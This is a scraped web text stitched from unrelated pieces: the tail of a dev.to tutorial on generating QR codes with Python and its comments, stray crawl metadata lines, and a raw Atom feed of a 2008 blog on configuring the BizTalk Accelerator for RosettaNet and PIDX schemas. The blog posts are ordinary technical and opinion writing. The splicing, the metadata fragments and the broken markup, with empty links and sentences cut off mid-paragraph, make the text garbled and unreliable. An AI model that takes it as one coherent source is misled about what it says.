code generated. - Automate the process to create multiple QR codes. - Include more functions (or object parameters) of the qrcodelibrary. - Try changing the colors and styles of the generated QR codes using different drawer modules and fill colors. - Use an application library (like Tkinter) to add a user interface. pyqrcode. Top comments (5) ▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️ ▫️▪️▪️▪️▪️▫️▪️▪️▪️▪️▫️▪️▫️ ▫️▪️▪️▫️▪️▪️▫️▪️▫️▪️▪️▪️▫️ ▫️▪️▪️▪️▪️▫️▪️▪️▪️▪️▫️▪️▫️ ▫️▪️▫️▪️▪️▪️▫️▪️▪️▪️▪️▪️▫️ ▫️▪️▫️▪️▫️▪️▪️▪️▫️▪️▫️▪️▫️ ▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️ LET'S GO! What an awesome, fun and quick to do project! Thanks Dharma! Oh snap, bobliuuu's first post!!! 😂 Yep!
https://dev.to/codedex/generate-a-qr-code-with-python-386m
CC-MAIN-2022-40
refinedweb
918
66.94
Jeff Lynch [MVP]Everything E-Commerce! Server2008-04-24T12:04:23ZCreating a PIDX Partner Interface Process (PIP) in BTARN 3.5/blogs/jeff.lynch/archive/2008/07/18/creating-a-pidx-partner-interface-process-pip-in-btarn-3-5.aspx2008-07-18T20:51:00Z2008-07-18T20:51:00Z<p.</p> <p>1. You begin by opening the BTARN Management Console and right-clicking on the <strong>Process Configuration Settings</strong> node in the left-hand pane and selecting<strong> New</strong> > <strong>Process Configuration</strong>.</p> <p><img src="" alt="" /> </p> <p>2. For PIDX configurations I recommend using a <strong>Display Code</strong> that includes the standard, the PIP and the version like “PIDX_P21_1.0”. This will make things a lot easier if you need to support multiple versions in the future. The <strong>Process Code</strong> corresponds to the PIP number which is “P21” in our case. The <strong>Version</strong> is “1.0” and the <strong>Process Name</strong> is “Invoice”. The <strong>Message Standard</strong> is “PIDX”, the <strong>Standard Version</strong> is “1.0” and the <strong>Payload Binding ID</strong> is also “PIDX. Once you are done, your <strong>General</strong> tab should look like this.</p> <p><img src="" alt="" /> </p> <p>3. The parameters you set on the <strong>Activity</strong> tab are very important and the required values can be found in the <a href="" target="_blank">PIDX Implementation Guide</a>. To meet the PIDX requirements, the <strong>Non-Repudiation Required, </strong><strong>Is Authorization Required</strong> and <strong>Non-Repudiation of Origin and Content</strong> parameters must all be set to “True” and the <strong>Type</strong> parameter must be set to “Request/Response”. The settings for all other parameters on the <strong>Activity</strong> tab must be agreed upon by both parties involved in the transaction. Once you are done, the <strong>Activity</strong> tab should look like this.</p> <p><img src="" alt="" /> </p> <p>4. The parameters you set on the <strong>Initiator</strong> tab are also very important and these are all specified by the PIDX P21 Invoice PIP documentation. It’s very important that you communicate these settings to your trading partner as well since they must be the same on both messaging systems. Once you are complete the <strong>Initiator</strong> tab should look exactly like this.</p> <p><img src="" alt="" /> </p> <p>5. The same goes for the <strong>Responder</strong> tab as shown here. </p> <p><img src="" alt="" /> </p> <p>There are a lot of parameters to set when creating a new Process Configuration in the BizTalk Accelerator for RosettaNet. Almost all of these are used by the <a href="" target="_blank">Initiator Private Process</a> and <a href="" target="_blank">Initiator Public Process</a> to create the outbound RNIF headers and message so it’s vital that you and your trading partner agree on all these before you begin testing.</p> <p>It’s pretty sad how complicated this is compared to an alternative such as AS2. As I’ve said before using RosettaNet is like “swatting a fly with an atom bomb”.</p> <p><em>Currently listening to Eric Marienthal’s Just Around the Corner.</em></p><div style="clear:both;"></div><img src="" width="1" height="1">jlynch Home Organizations & Partners in BTARN 3.5/blogs/jeff.lynch/archive/2008/07/10/creating-home-organizations-amp-partners-in-btarn-3-5.aspx2008-07-10T20:52:00Z2008-07-10T20:52:00Z<p>This is a fairly straight-forward task but since it’s the first thing you’ll need to configure in the <a href="" target="_blank">BizTalk Accelerator for RosettaNet 3.5</a> (BTARN 3.5), I thought I’d walk through it anyway.</p> <h4>Creating a Home Organization</h4> <p>1. You begin by opening the BTARN Management Console and right-clicking on the <strong>Home Organization</strong> node in the left-hand pane.</p> <p><img src="" alt="" /> </p> <p>2. Next you’ll need to add the home organization’s name, DUNS number (circled in red below), a brief description and then choose a Home organization classification from the drop-down menu.</p> <p><img src="" alt="" /> </p> <p>3. Next you’ll need to add some contact information as shown here below.</p> <p><img src="" alt="" /> </p> <p>4. Click <strong>Apply</strong> and <strong>OK</strong> to save your new Home Organization. It’s that simple.</p> <h3>Creating a Partner</h3> <p).</p> <p><img src="" alt="" /> </p> <p>2. Next you’ll need to add some contact information as shown here below.</p> <p><img src="" alt="" /> </p> <p>3. Click <strong>Apply</strong> and <strong>OK</strong> to save your new Partner. Again, it’s that simple.</p> <p>If you take a look at the BizTalk Server 2006 Administration Console under the <strong>Parties</strong> node, you’ll see your new Home Organization and Partner in the list just as you would expect. </p> <p>As I said, all very straight-forward! Don’t let this fool you however, later I’ll post about how to create a new Agreement and you’ll probably end up just as confused as I was the first time!</p> <p><em><font color="#008000">Currently listening to: Martina McBride’s For These Times</font></em></p><div style="clear:both;"></div><img src="" width="1" height="1">jlynch RosettaNet Message Flow in BizTalk Server 2006/blogs/jeff.lynch/archive/2008/06/26/understanding-rosettanet-message-flow-in-biztalk-server-2006.aspx2008-06-26T21:54:00Z2008-06-26T21:54:00Z <p><font face="Verdana">If a picture is worth a thousand words, then these two diagrams (courtesy & copyright Microsoft) are worth millions! At least they are to anyone desperate to understand how the <a href="" target="_blank">BizTalk Accelerator for RosettaNet (BTARN 3.5)</a> really works.</font></p> <p><img src="" alt="" /></p> <h3><font face="Verdana">Initiator Message Flow</font></h3> <p><font face="Verdana">Don’t let the complexity of this diagram scare you. The message flow for an outbound RNIF (or PIDX) message consists of four key areas.</font></p> <ol> <li><font face="Verdana">The <a href="" target="_blank">SQL Server BTARN Databases</a> where all “lob” messages (such as a P21 – PIDX Invoice) and any attachments are stored BEFORE the outbound RNIF message flow actually begins, and the SQL Receive Location used to process the message content and attachments into the MessageBox. <br /> <br /> <em><font color="#808000">Note: If you’re not sending attachments you may elect not to use SQL for this and can substitute FILE receive locations. The SDK contains sample code and a pretty good explanation of how this may work.</font></em></font> <br /> <br /> </li> <li><font face="Verdana">The <a href="" target="_blank">Initiator Private Process</a> orchestration where the actual messages and attachments are “prepared” (usually transformed into XML) for further processing by the initiator public process.</font> <br /> <br /> </li> <li><font face="Verdana">The <a href="" target="_blank">Initiator Public Process</a> orchestration where the outbound message is actually formatted to meet the RNIF standard. This includes adding the required RNIF headers and other such tasks. Consider this a “Black Box” since you can’t change how this works without invalidating the RosettaNet certification.</font> <br /> <br /> </li> <li><font face="Verdana">The HTTP/HTTPS Send Ports and the <a href="" target="_blank">RNIFSend.aspx</a> web application that are CRITICAL to the correct processing of the outbound messages. This is where the real work is done to validate the messages, create the correct MIME headers and add the required RNIF DOCTYPE declarations. <br /> <br /> <em><font color="#808000">Just a side note. If you’re really interested in how this all works, you can look at the source code for this web application using Lutz Roeder’s </font></em><a href="" target="_blank"><em><font color="#808000">Reflector</font></em></a><em><font color="#808000">. I think you’ll be amazed at how much Regex is used to “craft” these RNIF messages.</font></em> </font> </li> </ol> <p><font face="Verdana"><img src="" alt="" /></font></p> <h3><font face="Verdana"><font face="Verdana">Responder Message Flow</font></font></h3> <p><font face="Verdana"><font face="Verdana">The message flow for an inbound RNIF message (whether it’s a new message or an asynchronous response to a message you’ve already sent) consists of three key areas.</font></font></p> <ol> <font face="Verdana"> <li><font face="Verdana">The <a href="" target="_blank">RNIFReceive.aspx</a> web application which processes the inbound message, validates it and then removes all the RNIF specific headers and DOCTYPE declarations. This then passes the message along to the <a href="" target="_blank">HTTP/HTTPS Receive Port and Pipeline</a> which handles the non-repudiation, decodes the message, parses the message and resolves which Party it came from.</font> <br /> <br /> </li> <li><font face="Verdana">The <a href="" target="_blank">Responder Public Process</a> receive the RNIF message from the MessageBox and extracts the content and attachments and sends them to the responder private process for further processing. Just like the initiator public process, the Responder Public Process should be considered a “Black Box” and left unchanged.</font> <br /> <br /> </li> <li><font face="Verdana">The <a href="" target="_blank">Responder Private Process</a> then routes the inbound messages and any attachments to the <a href="" target="_blank">SQL Server BTARN Databases</a> where it can be further processed and sent to some “lob” back-end system.</font> </li> </font></ol> <p><font face="Verdana"><font face="Verdana".</font></font></p> <p><font face="Verdana"><font face="Verdana"><font face="Verdana"><strong>Best of all, it’s included in the price of BizTalk Server 2006 R2!</strong></font></font></font></p> <p><font face="Verdana"><font face="Verdana"><font color="#808000" face="Verdana"><em>Currently listening to Carrie Underwood’s Carnival Ride</em></font></font></font></p> <div style="clear:both;"></div><img src="" width="1" height="1">jlynch Schemas Solution for BizTalk Server 2006/blogs/jeff.lynch/archive/2008/06/25/pidx-schemas-solution-for-biztalk-server-2006.aspx2008-06-25T21:05:00Z2008-06-25T21:05:00Z<p><font face="Verdana">One of the things you’ll need when working with PIDX / RNIF / BTARN projects in BizTalk Server 2006 is the actual PIDX schemas (.xsd) to be used. Luckily the </font><a href="" target="_blank"><font face="Verdana">American Petroleum Institute</font></a><font face="Verdana"> (API) has a public web site for the </font><a href="" target="_blank"><font face="Verdana">Petroleum Industry Data Exchange</font></a><font face="Verdana"> (PIDX) committee which contains links to the various versions of their schemas. </font></p> <p><font face="Verdana">Once you and your trading partner decide on which version you’ll be using, you can download the schemas and add them to your BizTalk solution in Visual Studio. When you attempt to open these schemas you’ll notice an error message that pops up as shown here.</font></p> <p><font face="Verdana"><img src="" alt="" /></font></p> <p><font face="Verdana">This is a fairly common error and usually occurs when the schema you are attempting to open contains a reference to another “imported” or “included” schema and the BizTalk Schema Editor tool cannot find the file in question. The work-around for this is fairly simple and all you’ll need to do is change these two attributes.</font></p> <p><img src="" alt="" /></p> <ol> <li><font face="Verdana">First you’ll need to click on the <strong>Imports</strong> attribute collection and delete the reference to the PIDX Library schema which contains the hard-coded location which is incorrect.<br /><img src="" alt="" /></font></li> <li><font face="Verdana">Next you’ll need to import a new schema as an <strong>XSD Include</strong> and select the <strong>PIDXLib</strong> from the picker as shown here.<br /><img src="" alt="" /></font></li> <li><font face="Verdana">Once that step is complete, you’ll also need to change the <strong>Root Reference</strong> attribute so that the BizTalk Schema Editor knows how to correctly identify your schema.<br /><img src="" alt="" /></font></li></ol> <p><font face="Verdana">And that's really all there is to it, except you'll have to do this for every PIDX schema and every version.</font></p> <p><strong><em><font face="Verdana">Good thing I've already done this and you can download the BizTalk Solution containing all the PIDX schemas right here!</font></em></strong></p> <p><font face="Verdana"><a class="" style="TEXT-DECORATION:none;" href=""><img style="TEXT-DECORATION:none;" src="" alt="" /></a></font></p><div style="clear:both;"></div><img src="" width="1" height="1">jlynch Server 2006 - BTARN 3.5 Configuration Tips/blogs/jeff.lynch/archive/2008/06/18/biztalk-server-2006-btarn-3-5-configuration-tips.aspx2008-06-18T14:42:00Z2008-06-18T14:42:00Z<p><font face="Verdana">Just a quick post to those of you planning to use the <a href="" target="_blank">BizTalk Accelerator for RosettaNet 3.5</a>. There are a few little “issues” that you need to know about before you get started.</font></p> <p><font face="Verdana"><strong><u>Accounts, Hosts & Host Instances</u></strong></font></p> <p><font face="Verdana">BTARN 3.5 requires the use of <strong>Hosts</strong> that have the <strong>Authentication Trusted</strong> option enabled. This has to be configured BEFORE you create any <strong>Host Instances</strong>. I recommend creating a new <strong>Service Account, </strong>a new <strong>In-Process Host</strong>, a new <strong>Isolated Host</strong> and then a new <strong>Host Instance</strong> for each of these as shown in the table below. You will also need to create new HTTP and SQL <strong>Send Handlers</strong> and <strong>Receive Handlers</strong> as well.</font></p> <p><font face="Verdana">Note: The In-Process Host Instance account and Isolated Host Instance account must be the same for BTARN to work properly! </font></p> <table class="" cellspacing="0" cellpadding="5"> <tr> <td class=""><font face="Verdana">Service Account:</font></td> <td class=""><font face="Verdana">Domain\AccountName</font></td></tr> <tr> <td class=""><font face="Verdana">In-Process Host:</font></td> <td class=""><font face="Verdana">RosettaNetApplication</font></td></tr> <tr> <td class=""><font face="Verdana">In-Process Host Instance:</font></td> <td class=""><font face="Verdana">RosettaNetApplication</font></td></tr> <tr> <td class=""><font face="Verdana">Isolated Host:</font></td> <td class=""><font face="Verdana">RosettaNetIsolatedHost</font></td></tr> <tr> <td class=""><font face="Verdana">Isolated Host Instance:</font></td> <td class=""><font face="Verdana">RosettaNetIsolatedHost</font></td></tr> <tr> <td class=""><font face="Verdana">SQL Send Handler:</font></td> <td class=""><font face="Verdana">RosettaNetApplication</font></td></tr> <tr> <td class=""><font face="Verdana">SQL Receive Handler:</font></td> <td class=""><font face="Verdana">RosettaNetApplication</font></td></tr> <tr> <td class=""><font face="Verdana">HTTP Receive Handler:</font></td> <td class=""><font face="Verdana">RosettaNetIsolatedHost</font></td></tr> <tr> <td class=""><font face="Verdana">HTTP Send Handler:</font></td> <td class=""><font face="Verdana">RosettaNetApplication</font></td></tr></table><br /> <p><font face="Verdana"><strong><u>Installation & Configuration</u></strong></font></p> <p><font face="Verdana">Don’t use “localhost” for your BizTalk Server or Web Server name when running the Configuration Wizard. Use the NetBIOS name of your BizTalk Server machine and the NetBIOS name of your Web Server machine instead. The Configuration Wizard will fail with a strange error if you use default “localhost”. </font></p> <p><font face="Verdana">Why? I have no earthly idea but I will be submitting this to the BizTalk team as a bug!</font></p> <p><img src="" alt="" /></p><br /> <p><img src="" alt="" /></p><br /> <p><font face="Verdana"><strong><u>One final note</u></strong></font></p> <p><font face="Verdana">All the BTARN bits are deployed to the BizTalk Application 1 by default. I’m still trying to find a way to isolate the RosettaNet bits (schemas, maps, pipelines, ports and orchestrations) in their own BizTalk Apllication much like the new EDI/AS2 bits are. I’ll post if I find an easy way to accomplish this.</font></p> <p><font face="Verdana">Happy Integrations!</font></p> <p><font face="Verdana"><strong><u>Update</u></strong></font></p> <p><font face="Verdana" color="red"><em>I just want everyone to know that I'm not really all that smart. I had a ton of help setting up BTARN 3.5 and getting things working properly! I hired the folks from Microsoft Consulting Services to come in and teach me everything I could learn about using RosettaNet in BizTalk Server 2006. Special thanks to Ross Santee! A great consultant.</em></font></p><br /><br /> <p><font face="Verdana" color="#008000" size="1">Currently listening to: Dave Koz – Castle of Dreams</font></p><div style="clear:both;"></div><img src="" width="1" height="1">jlynch for Using PIDX Schemas in BizTalk Server 2006/blogs/jeff.lynch/archive/2008/06/13/tips-for-using-pidx-schemas-in-biztalk-server-2006.aspx2008-06-13T19:18:00Z2008-06-13T19:18:00Z<p><font face="Verdana">Day 3 in my <a href="">RosettaNet</a> implementation nightmare and I still can’t see the end of the road!</font></p> <p><font face="Verdana">As you may or may not know, the American Petroleum Institute (<a href="">API</a>) has it’s own set of XML schemas and transport standards know as the Petroleum Industry Data Exchange or <a href="">PIDX</a> for short. This is the actual “standard” that my current RosettaNet project is really all about. The interesting about these schemas is the fact that they use their own unique namespace and prefix as shown below:</font></p> <p><font face="Verdana"><font color="#ff0000">xmlns:pidx</font><font color="#0000ff">=</font><strong><font color="#ff0000"><a href=""></a></font></strong><font color="#0000ff"></font></font></font></p> <p><font face="Verdana">Since the BizTalk Mapper tool always generates XML document with the “ns0″ prefix and there is no property you can set to change this, you’ll need to use a little “XSLT slight-of-hand” to get this to work.</font></p> <p><font face="Verdana"><strong>Step 1:</strong> Create your BizTalk Map as you normally would using the mapper tool.</font></p> <p><font face="Verdana"><strong>Step 2:</strong> Validate your map and open the xslt generated by BizTalk Server 2006 in your favorite text editor. This file can usually be found in the “\temp\_mapdata” folder.</font></p> <p><font face="Verdana"><strong>Step 3:</strong> Replace all instances of the namespace prefix “ns0″ with the prefix you require (which in this case is “pidx”) as shown below.</font></p> <p><img src="" alt="" /></p> <p><font face="Verdana"><strong>Step 4:</strong> Save the result as an .xslt file and include it (or add it) into your BizTalk project.</font></p> <p><font face="Verdana"><strong>Step 5:</strong> Create a new map using the same source and destination schemas you used in Step 1 but use the external xslt you generated by setting the “Custom XSLT Path” property on your new map.</font></p> <p><font face="Verdana">The results are shown in the figure below. Viola! The “ns0″ namespace prefix has been replaced by the desired “pidx” prefix.</font></p> <p><img src="" alt="" /></p> <p><font face="Verdana">Click below for more information about using external xslt in your maps.</font></p> <p><font face="Verdana"><a href="">Custom XSLT in BizTalk Maps</a></font></p> <p><font face="Verdana"><strong>Take Away:</strong> There is always more than one way to skin a cat! In BTS2006 it may not be obvious how to do something a little unusual.</font></p><div style="clear:both;"></div><img src="" width="1" height="1">jlynch Process Automation – Don’t Just Shift the Costs!/blogs/jeff.lynch/archive/2008/06/12/business-process-automation-don-t-just-shift-the-costs.aspx2008-06-12T21:30:00Z2008-06-12T21:30:00Z<p><em><font face="Verdana" color="#ff0000">I'm stepping on my soapbox again so be warned!</font></em></p> <p><font face="Verdana">I've recently encountered a number of well-intentioned (or perhaps not so well-intentioned) companies looking to reduce their internal costs for processing orders and invoices through some sort of "business process automation" system. Being an avid BPA developer I applaud these efforts so long as they bring "value" to everyone in the supply chain. What I see all too often is companies spending thousands and thousands of dollars on web-based initiatives where the main goal is to shift the transaction processing from themselves to their suppliers. From a business perspective, this just isn't a wise choice and from a technological perspective, it just isn't necessary. Having your suppliers enter their invoices first on their ERP system and then on your web-based system does not reduce the "transaction cost" it just shifts the labor from yourself to your supplier.</font></p> <p><font face="Verdana"><strong>True B2B Integration Doesn't Just Shift Costs, It Eliminates Them!</strong></font></p> <p><font face="Verdana">The Internet offers developers the unparalleled opportunity to connect disparate systems together without paying EDI "VAN" (Value Added Private Network) charges, telecom "WAN" (wide area network) charges or even leased-line charges. Basically, all the infrastructure costs are essentially free or paid for though corporate web access. All the developer (and business analyst) has to do is "connect-the-dots" using products like Microsoft’s BizTalk Server, Tibco’s iProcess Suite or Software AG’s WebMethods product to eliminate the real transaction costs. It's never been easier or more affordable to do this and the benefits to the entire supply chain are enormous! Automating the transaction processing so that the document (purchase order or invoice) is "touched" by human hands only during it's creation doesn't just shift costs, it eliminates them!</font></p> <p><font face="Verdana">Yes, I've heard all the arguments about how "costly" B2B integration can be and how smaller companies really can't afford to participate but <strong>IT JUST ISN'T TRUE!</strong> Products like BizTalk Server 2006 make BPA truly affordable for companies of any size. I know of at least one very small company that used this product to integrate QuickBooks (their "ERP" system) to their much larger suppliers and customers. If they can do this without breaking the bank, anyone can!</font></p> <p><font face="Verdana"><strong><em>Developer Call To Action:</em></strong> The next time your senior management talks about automating business processes with customers and suppliers, don't just develop a BPA system that shifts the costs, work to eliminate them altogether!</font></p><div style="clear:both;"></div><img src="" width="1" height="1">jlynch: Who Invents This Stuff?/blogs/jeff.lynch/archive/2008/06/11/rosettanet-who-invents-this-stuff.aspx2008-06-11T14:24:00Z2008-06-11T14:24:00Z<p><font face="Verdana" color="#ff0000" size="2"><em>Captain Picard - “Admiral, we’ve engaged the Borg”</em></font></p> <p><font face="Verdana">Day 2 in my <a href="" target="_blank">RosettaNet development project</a> and all I can say is “Who Invents This Stuff”?</font></p> <p><font face="Verdana">Yes, it’s been a glorious two days of trying to comprehend the world’s most complicated business-to-business process. Only the electronics industry could conceive of something so overly complex. Secure, internet-based transactions were never meant to be this difficult. It’s like swatting a fly with an atom bomb! After ten years of B2B development I though I had seen it all. Boy, was I wrong!</font></p> <p><font face="Verdana">And the worse thing is that you have to pay for the privilege of enduring this torture. Every other xml standards organization I’ve ever dealt with freely distributes their schemas and specifications for everyone to use. Not so for the folks at <a href="" target="_blank">RosettaNet.org</a>! You’ll have to pay anywhere from several hundred to several thousand dollars for the rights to use their “PIP”s (Partner Interface Process) which is really nothing for than an XML DTD or XSD (schema) and a process guide explaining the message flow. It looks like RosettaNet.org used to publish these on their web site but now you’ll have to pay for a subscription to get these.</font></p> <p><font face="Verdana">Why on earth would so many smart B2B developers adopt such an overly complex, expensive and time consuming standard is beyond my understanding. Folks, business-to-business transactions do NOT have to be this difficult.</font></p> <p><font face="Verdana">Stay tuned for more fun & games!</font></p><div style="clear:both;"></div><img src="" width="1" height="1">jlynch Server 2006 R2: To Boldly Go Where No Man Has Gone Before!/blogs/jeff.lynch/archive/2008/06/09/biztalk-server-2006-r2-to-boldly-go-where-no-man-has-gone-before.aspx2008-06-09T14:53:00Z2008-06-09T14:53:00Z<p><font face="verdana">This week I’m going to embark on a dark and mysterious journey, fraught with great danger, both real and imagined. I’m about to begin development of a <a href="" target="_blank">BizTalk Accelerator for RosettaNet</a> (BTARN 3.5) project with the assistance of Microsoft Consulting Services. For those of you experienced in BizTalk development, you’ll understand my trepidation. For those of you familiar with <a href="" target="_blank">RosettaNet</a> (RNIF), you’ll understand my sheer terror!</font></p> <p><font face="verdana">If I survive this ordeal, I promise to post about my experiences, so that future generations of BizTalk developers don’t make the same mistakes, don’t fall into the same traps and don’t lose what little is left of their rapidly graying hair!</font></p> <p><font face="verdana">Stay tuned!</font></p><div style="clear:both;"></div><img src="" width="1" height="1">jlynch Freelance Work/blogs/jeff.lynch/archive/2008/05/20/finding-freelance-work.aspx2008-05-20T13:14:00Z2008-05-20T13:14:00Z<p><font face="Verdana">I received a recent comment from Paul, asking how I found my "weekend gigs" or freelance development work. That's a pretty good question and the short answer (without sounding too presumptuous) is that God provides! The long answer is "I don't really know, it just seems to happen".</font></p> <p><font face="Verdana">I started my career many years ago as a degreed mechanical engineer, fresh from college and looking for fame and fortune in the "oil business" (which in Texas is correctly pronounced "Awl Bidness"). Unfortunately, I arrived on the scene just in time to watch oil drop from $40 per barrel down to $7 per barrel which left myself and about 100,000 other engineers scrambling for any work we could find. (If you're a history buff or just follow the price of oil, you should be able to place my age within +/- 2 years from this information) Luckily, I landed a real engineering job for a valve manufacturer in Houston. I worked for that company for 18 years and watched it grow from $50 million in revenue to over $40 billion as it was acquired and reacquired over the next ten years. When I began with the company we had 300 employees and when I left the "company" we had over 240,000 employees and our CEO and CFO had just been indicted for tax evasion and securities fraud among other things. Care to guess the name of that company?</font></p> <p><font face="Verdana">I held a number of engineering, product management and sales & marketing positions in that 18 year period and finally got tired of all the politics and corporate ladder climbing. So I asked the IT Director (a good friend) if he could find a position for me somewhere in the IT programming or operations area so that I could explore my love of computers, software and e-commerce. My friend and new boss gave me the opportunity to learn, do, and learn by doing and we had a blast. We put together that company's first web site, first e-commerce site and first B2B system using pre-release versions of Microsoft's SQL Server, BizTalk Server and Commerce Server. Over the next two years, with the help of some great people at Microsoft (yes, the Blue Monster really does have some great people) we designed and built a world-class B2B e-commerce system for (you guessed it) Tyco. One that has transacted literally hundreds of millions of dollars in transactions and is still in use almost ten years later. </font></p> <p><font face="Verdana">My boss and I left Tyco, formed our own B2B consulting firm and as we had hoped, got Tyco as a client. The first year was great. We had lots of projects, worked 70 hour weeks and made good money. The second year taught us the lesson that most consultants come to call "going from feast to famine". We called it something else (mostly unprintable) but learned several valuable lessons from the experience. I learned that I'm not cut out to be a full-time consultant and for me, it's tremendously important to see "the fruits of my labors". Which is why I work for a great medium-size "private" company today and do my "freelance" work in the evenings and on the weekends "as my time and energy permits".</font></p> <p><font face="Verdana"><strong>How do I find the work?</strong> I don't really. It just seems to find me somehow, but I can give you a few tips to get started!</font></p> <ul> <li><font face="Verdana"><strong>Do volunteer work!</strong> It's good for the soul and opens you to all sorts of opportunities.<br /></font></li> <li><font face="Verdana"><strong>Give back to the community!</strong> Share your best work, start a blog or two. Post in the community forums. <br /></font></li> <li><font face="Verdana"><strong>Answer your email and every (non-spam) blog comment!</strong> It's amazing how word gets around the Internet. <br /></font></li> <li><font face="Verdana"><strong>Try something new!</strong> Life is way too short to always take the safe road. Learn a new programming language. Hell, learn a new language period. <br /></font></li> <li><font face="Verdana"><strong>Be courageous!</strong> Buy a Mac. Become a fanboy! Put an Apple sticker on your car. </font></li></ul><br /> <p><font face="Verdana" size="1"><em>Currently listening to Diana Krall's "The Look of Love".</em></font></p><div style="clear:both;"></div><img src="" width="1" height="1">jlynch Double Life!/blogs/jeff.lynch/archive/2008/05/15/my-double-life.aspx2008-05-15T06:41:00Z2008-05-15T06:41:00Z<p><font face="Verdana">As most of you know, during the day I’m a mild-mannered .NET developer using all things Microsoft. But I lead a double life!</font></p> <p><font face="Verdana".</font></p> <p><font face="Verdana" </font><a href=""><font face="Verdana"></font></a><font face="Verdana"> (wordpress.com) to post about Mac & iPhone development, my new business and life in general.</font></p> <p><font face="Verdana">I still plan to post regularly on this blog about all things Microsoft, so don't fret! But if you're like many of us and have a foot on both sides of the Microsoft and Apple fence, please join me at </font><a href=""><font face="Verdana"></font></a><font face="Verdana"> and have a good read! I'll also let you know when my new web site is up and running!</font></p> <p><em><font face="Verdana" color="#800080" size="1">Currently reading: Inside Steve's Brain by Leander Kahney</font></em></p><div style="clear:both;"></div><img src="" width="1" height="1">jlynch Server 2007: Importing Excel Catalog Data/blogs/jeff.lynch/archive/2008/05/08/commerce-server-2007-importing-excel-catalog-data.aspx2008-05-08T14:07:00Z2008-05-08T14:07:00Z<p><font face="Verdana">This just came up in the Commerce Server forums and I wanted to remind everyone that FarPoint Technologies has an Excel parser component (<a href="" target="_blank"> FarPoint Spread for BizTalk Server 2006</a>) that can be used to create a simple process for uploading Excel catalog data into Commerce Server 2007.</font></p> <p><font face="Verdana">The FarPoint website contains training videos, the case study I participated in, and lots of other technical information on this very cool tool!</font></p> <p><font face="Verdana">If you missed my previous posts, you should take a look!</font></p> <p><font face="Verdana"><a title="BizTalk Server 2006- Excel Parser News!" href="">BizTalk Server 2006- Excel Parser News!</a></font></p> <p><font face="Verdana"><a title="BizTalk Server 2006- FarPoint XLS File Pipeline Component Schema Wizard" href="">BizTalk Server 2006- FarPoint XLS File Pipeline Component Schema Wizard</a></font></p> <p><font face="Verdana"><a title="BizTalk Server 2006- FarPoint Spread for BizTalk Server 2006 Beta" href="">BizTalk Server 2006- FarPoint Spread for BizTalk Server 2006 Beta</a></font></p> <p><font face="Verdana"><a title="BizTalk Server 2006- FarPoint's Spread for BizTalk Server 2006 Released!" href="">BizTalk Server 2006- FarPoint's Spread for BizTalk Server 2006 Released!</a></font></p> <p><font face="Verdana">Just ping me at <a href="mailto:jeffrey.t.lynch@[nospam]comcast.net">jeffrey.t.lynch@[nospam]comcast.net</font></a> if you need a copy of my entire BizTalk solution for this. It's free of charge for any existing Commerce Server customer that buys the FarPoint Spread for BizTalk Server 2006 component as my way of saying thanks!</font></p> <p><font face="Verdana">Best regards,</font></p> <p><font face="Verdana">Jeff</font></p><div style="clear:both;"></div><img src="" width="1" height="1">jlynch "Head" Rendering Issues!/blogs/jeff.lynch/archive/2008/05/02/asp-net-quot-head-quot-rendering-issues.aspx2008-05-02T22:05:00Z2008-05-02T22:05:00Z<p><font face="Verdana" face="Verdana">If the answer is yes, have you ever looked closely at the HTML markup your ASP.NET code generates? I mean taken a really, REALLY close-up look?</font></p> <p><font face="Verdana" face="Verdana"><img src="" alt="" /> </font></p> <p><font face="Verdana"!</font></p> <p><font face="Verdana">However, if you Google (or Live Search) long enough, you'll find a few posts about something called <a href="" target="_blank">Adaptive Control Behavior</a> in the MSDN Library and three very well hidden posts by <a href="" target="_blank">Anatoly Lubarsky</a> with some great sample code!</font></p> <p><font face="Verdana"><a title="" href=""></a></font></p> <p><font face="Verdana"><a title="" href=""></a></font></p> <p><font face="Verdana"><a title="" href=""></a></font></p> <p><font face="Verdana">These three posts and the sample code you can <a href="" target="_blank">download here</a>, turn this code ...</font></p> <p><img src="" alt="" /></p> <p><font face="Verdana">into this markup ...</font></p> <p><img src="" alt="" /></p> <p><font face="Verdana" face="Verdana">I use "View Source" and Firebug almost every day to look at my own markup as well as the markup of sites who's authors I respect. I want my markup to look every bit as professional as the markup of a professional web "designer" such as <a href="" target="_blank">Dan Cederholm</a>, <a href="" target="_blank">John Gruber</a> or <a href="" target="_blank">Andy Clarke</a>.</font></p> <p><font face="Verdana">Don't you?</font></p> <p><font face="Verdana" color="#008000" size="1"><em>Currently listening to: "Caravan of Dreams" by Peter White</em></font></p><div style="clear:both;"></div><img src="" width="1" height="1">jlynch Thoughts on HTML5, CSS3 & WebKit Advances!/blogs/jeff.lynch/archive/2008/04/25/more-thoughts-on-html5-css3-amp-webkit-advances.aspx2008-04-25T17:28:00Z2008-04-25T17:28:00Z<p><font face="Verdana">Yesterday I wrote a post on <a href="" target="_blank">Why Safari May Become the Browser of Choice<="Verdana".</font></p> <p><font face="Verdana".</font></p> <p><font face="Verdana"="Verdana".</font></p> <p><font face="Verdana"><font face="Verdana" color="#408080" size="1">Currently listening to: "Still Feels Good" by Rascal Flatts</font></p><div style="clear:both;"></div><img src="" width="1" height="1">jlynch Safari May Become the Browser of Choice!/blogs/jeff.lynch/archive/2008/04/24/why-safari-may-become-the-browser-of-choice.aspx2008-04-24T17:04:23Z2008-04-24T17:04:23Z><div style="clear:both;"></div><img src="" width="1" height="1">jlynch
http://codebetter.com/blogs/jeff.lynch/atom.aspx
crawl-002
refinedweb
6,225
53.71
